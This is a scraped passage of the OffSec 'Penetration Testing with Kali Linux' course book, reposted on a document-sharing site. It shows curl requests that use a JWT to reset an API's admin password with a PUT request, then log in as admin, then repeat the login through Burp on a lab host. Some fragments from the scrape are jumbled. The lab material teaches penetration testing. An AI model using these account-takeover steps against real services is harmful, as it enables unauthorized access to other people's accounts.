Penetration Testing with Kali Linux OffSec
curl \ 'http://192.168.50.16:5002/users/v1/admin/password' \
|
- Bu səhifədəki naviqasiya:
- -d {"password": "pwned"} { "detail": "The method is not allowed for the requested URL.", "status": 405, "title": " Method Not Allowed
- -d {"password": "pwned"}
|
curl \
'http://192.168.50.16:5002/users/v1/admin/password' \ -H 'Content-Type: application/json' \ -H 'Authorization: OAuth eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NDkyNzEyMDEsImlhdCI6MTY0OTI3MDkwMSwic 3ViIjoib2Zmc2VjIn0.MYbSaiBkYpUGOTH-tw6ltzW0jNABCDACR3_FdYLRkew' \ -d '{"password": "pwned"}' { "detail": "The method is not allowed for the requested URL.", "status": 405, "title": " Method Not Allowed ", "type": "about:blank" } Listing 116 - Attempting to Change the Administrator Password via a POST request We passed the JWT key inside the Authorization header along with the new password. Sadly, the application states that the method used is incorrect, so we need to try another one. The PUT method (along with PATCH) is often used to replace a value as opposed to creating one via a POST request, so let’s try to explicitly define it next: kali@kali:~$ curl -X 'PUT' \ 'http://192.168.50.16:5002/users/v1/admin/password' \ -H 'Content-Type: application/json' \ -H 'Authorization: OAuth eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NDkyNzE3OTQsImlhdCI6MTY0OTI3MTQ5NCwic 3ViIjoib2Zmc2VjIn0.OeZH1rEcrZ5F0QqLb8IHbJI7f9KaRAkrywoaRUAsgA4' \ -d '{"password": "pwned"}' Listing 117 - Attempting to Change the Administrator Password via a PUT request This time we received no error message, so we can assume that no error was thrown by the application backend logic. To prove that our attack succeeded, we can try logging in as admin using the newly-changed password. kali@kali:~$ curl -d '{"password":"pwned","username":"admin"}' -H 'Content-Type: application/json' http://192.168.50.16:5002/users/v1/login {"auth_token": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NDkyNzIxMjgsImlhdCI6MTY0OTI3MTgyOCwi c3ViIjoiYWRtaW4ifQ.yNgxeIUH0XLElK95TCU88lQSLP6lCl7usZYoZDlUlo0", "message": "Successfully logged in.", "status": "success"} Listing 118 - Successfully logging in as the admin account Nice! We managed to take over the admin account by exploiting a logical privilege escalation bug present in the registration API. 357 (Wikipedia, 2022), https://en.wikipedia.org/wiki/JSON_Web_Token Penetration Testing with Kali Linux PWK - Copyright © 2023 OffSec Services Limited. All rights reserved. 231 These kind of programming mistakes happen to various degrees when building web applications that rely on custom APIs, often due to lack of testing and secure coding best practices. So far we have relied on curl to manually assess the target’s API so that we could get a better sense of the entire traffic flow. This approach, however, will not properly scale whenever the number of APIs becomes significant. Luckily, we can recreate all the above steps from within Burp. As an example, let’s replicate the latest admin login attempt and send it to the proxy by appending the –proxy 127.0.0.1:8080 to the command . Once done, from Burp’s Repeater tab, we can create a new empty request and fill it with the same data as we did previously. Figure 108: Crafting a POST request in Burp for API testing Next, we’ll click on the Send button and verify the incoming response on the right pane. Penetration Testing with Kali Linux PWK - Copyright © 2023 OffSec Services Limited. All rights reserved. 232 Figure 109: Inspecting the API response value Great! We were able to recreate the same behavior within our proxy, which, among other advantages, enables us to store any tested APIs in its database for later investigation. Once we’ve tested a number of different APIs, we could navigate to the Yüklə Dostları ilə paylaş:
|